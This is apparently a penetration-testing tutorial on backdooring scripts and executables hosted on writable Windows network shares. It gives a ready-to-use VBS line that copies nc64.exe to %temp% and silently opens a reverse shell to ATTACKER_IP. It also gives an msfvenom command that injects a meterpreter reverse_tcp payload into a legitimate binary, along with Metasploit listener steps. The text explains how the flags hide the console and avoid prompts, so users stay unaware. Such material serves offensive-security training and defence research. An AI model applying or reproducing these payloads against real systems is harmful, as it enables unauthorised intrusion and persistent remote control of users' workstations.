Abusing writable shares
It is quite common to find network shares that host executables or scripts created by an administrator so that users can perform their daily tasks. This is convenient for users, since they can run the shared resource without copying or installing it themselves.
Whenever a user opens the shortcut on their workstation, the executable or script is copied from the server to the local %temp% folder and executed from there. Any payload we plant therefore runs on the user's workstation, in the context of the logged-in user account.
If the share is writable by anyone (or at least by our compromised account), we can abuse this to create a backdoor.
.vbs scripts
Given that we have found a VBS (.vbs) script hosted on the share, we can inject malicious code into it to provide ourselves with a backdoor.
Step 1
First, we have to upload a binary (such as nc64.exe) to the share that will aid us in creating the backdoor. This can be achieved using smbclient.
Step 2
Next, we inject the malicious line into the existing script. Assuming that the writable share is at \\TARGET_IP\writable_share:
CreateObject("WScript.Shell").Run "cmd.exe /c copy /y \\TARGET_IP\writable_share\nc64.exe %temp% & %temp%\nc64.exe -e cmd.exe ATTACKER_IP PORT", 0, True
Essentially, this line runs a command through cmd.exe which first calls copy to copy the uploaded nc64.exe binary from the share to the %temp% directory, and then executes it as a reverse shell (-e cmd.exe) back to our listener, providing us a backdoor on the workstation.
The /y flag passed to copy "suppresses prompting to confirm that you want to overwrite an existing destination file", so the payload does not hang on a prompt if nc64.exe is already present from an earlier run.
According to Microsoft's documentation for the Run method of WScript.Shell, the last two arguments mean the following:
intWindowStyle
Optional. Integer value indicating the appearance of the program's window. Note that not all programs make use of this information.
A value of 0 "hides the window and activates another window", so the user does not see a console pop up.
bWaitOnReturn
Optional. Boolean value indicating whether the script should wait for the program to finish executing before continuing to the next statement in your script.
If set to True, script execution halts until the program finishes. Note that this means the rest of the user's original script does not run until our reverse shell exits; if the script has a visible purpose, setting it to False lets the original logic continue while the shell stays open.
Step 3
Finally, we have to start a listener using exploit/multi/handler from Metasploit. From then on, we gain a remote shell on a user's workstation whenever someone executes the script.
.exe files
Given that we have found a Windows binary such as an .exe file, we can download it from the share and use msfvenom to inject backdoor functionality. The result is a binary that still fulfils its original purpose but silently executes an additional payload.
Step 1
We can use the downloaded binary as a template to create a new malicious binary (suppose the binary is named vuln.exe):
$ msfvenom --platform windows -x vuln.exe -k -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -b "\x00" -f exe -o mal_vuln.exe
Step 2
Finally, we have to start a listener using exploit/multi/handler from Metasploit, with the same payload given to msfvenom. After uploading mal_vuln.exe to the share in place of the original, we gain a remote shell on a user's workstation whenever someone executes the binary.